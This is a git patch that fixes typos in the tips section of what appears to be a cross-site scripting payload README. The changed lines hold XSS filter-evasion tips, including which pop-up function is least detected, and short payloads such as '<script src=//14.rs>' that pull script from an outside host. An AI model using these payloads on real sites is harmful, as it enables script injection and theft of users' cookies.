From c6c2aa9889bd838de4bcc13463438dc31315bc71 Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Sun, 11 Mar 2018 21:35:42 +0530 Subject: [PATCH] fixed some typo --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index f57e44f..bba5c51 100644 --- a/README.md +++ b/README.md @@ -66,9 +66,9 @@ Come back later ### Awesome Tips & Tricks - http:// can be shortened to // - **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. -- alert and other function don't need a value, so stop doing **alert(1)** and start doing **alert()** -- I have found that **confirm** is the least detected pop-up function so stop using alert. -- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"glt;** +- alert and other pop-up functions don't need a value, so stop doing **alert(1)** and start doing **alert()** +- I have found that **confirm** is the least detected pop-up function so stop using **alert**. +- Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"&glt;** - The shortest independent payload is **<embed src=//14.rs>** (19 chars) ## Credits and all that